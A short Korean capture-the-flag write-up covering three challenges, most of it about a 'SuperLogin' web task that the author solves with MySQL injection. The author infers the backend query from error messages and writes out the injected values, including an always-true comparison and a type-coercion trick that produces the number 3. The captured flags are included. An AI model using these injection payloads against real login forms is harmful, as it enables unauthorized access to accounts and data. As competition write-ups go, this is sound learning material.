4. 3. [WEB50] Welcome to korea
링크에 들어가면 warning.or.kr 같은 게 뜨는데, 프록시로 들어가면 플래그가 보인다.
Flag is {2015qudtlssus}
4. [MISC1] rootnix의 선물
대회 홈페이지에 로그인하면 쿠키에 flag가 박혀있다.
goodbyerootnix
5. [WEB300] SuperLogin
링크에 들어가 보면 로그인 폼이 하나있다.
로그인하면 ?column1=id&id=id&column2=id&pw=pw 이런 식으로 리퀘스트를 보내는데,
특수문자만 쓸 수 있고 MySQL 에러가 보인다.
에러를 봤을 때,
select * from user where $column1=’$id’ and $column2=$pw
이런 식의 쿼리를 보내는 것 같다. 이상하게도 $pw는 쿼트로 안 막아뒀다.
~~ where id=’_’ and pw=’’||’’=”” 로 만들어서 로그인 시키면
hi guest
login as '3l33t'
라고 뜬다. 3l33t로 로그인을 해야하는데, id가 3으로 시작하므로
~~ where id=3 같은 식으로 숫자 비교로 만들면 될 듯하다. 그래서
~~ where id=’’ and pw='+!('_')+!('_')+!('_') 이렇게 쿼리를 만들어 보냈다.
’’ and pw='나 ‘_’ 같이 앞에 숫자가 없는 문자열은 숫자로 바뀌면 0이기 때문에 !을 붙이면 1이
되고, 세 개를 더해서 3을 만들었다.
hi 3l33t
Flag is {rhkdrhkddnfjrEkbb}